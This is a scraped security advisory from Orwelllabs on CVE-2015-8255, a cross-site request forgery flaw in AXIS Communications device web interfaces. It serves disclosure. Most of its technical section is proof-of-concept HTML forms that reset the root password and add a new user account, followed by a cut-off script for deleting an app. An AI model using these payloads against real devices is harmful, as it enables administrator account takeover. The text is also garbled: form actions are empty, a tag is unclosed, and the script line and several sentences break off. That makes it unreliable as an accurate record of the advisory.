AXIS Communications Cross Site Request Forgery

AXIS Communications suffers from a cross site request forgery vulnerability.

MD5 | 280b73f6048d043bb943cdc67b14838d

security advisory

Advisory Information
- Title: Cross-Site Request Forgery
- Vendor: AXIS Communications
- Research and Advisory: Orwelllabs
- Class: Session Management control [CWE-352]
- CVE Name: CVE-2015-8255
- Affected Versions:
- IoT Attack Surface: Device Web Interface
- OWASP IoTTop10: I1

Technical Details
Because of the own (bad) design of this kind of device (Actualy a big
problem of IoT, one of them)
The embedded web application does not verify whether a valid request was
intentionally provided by the user who submitted the request.

#-> Setting root password to W!nst0n

<!-- CSRF PoC Orwelllabs -->
<form action="">
<input type="hidden" name="action" value="update" />
<input type="hidden" name="user" value="root" />
<input type="hidden" name="pwd" value="w!nst0n" />
<input type="hidden" name="comment" value="Administrator" />
<input type="submit" value="Submit request" />

#-> Adding new credential SmithW:W!nst0n

<!-- CSRF PoC - Orwelllabs -->
<form action="">
<input type="hidden" name="action" value="add" />
<input type="hidden" name="user" value="SmithW" />
<input type="hidden" name="sgrp"
<input type="hidden" name="pwd" value="W!nst0n" />
<input type="hidden" name="grp" value="users" />
<input type="hidden" name="comment" value="WebUser" />
<input type="submit" value="Submit request" />

#-> Deleting an app via directly CSRF (axis_update.shtml)<script src="

[And many acitions allowed to an user [all of them?] can be forged in this

Vendor Information, Solutions and Workarounds
Well, this is a very old design problem of this kind of device, nothing new
to say about that.

These vulnerabilities has been discovered and published by Orwelllabs.

Legal Notices
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. We accept no
responsibility for any damage caused by the use or misuse of this

About Orwelllabs

Related Posts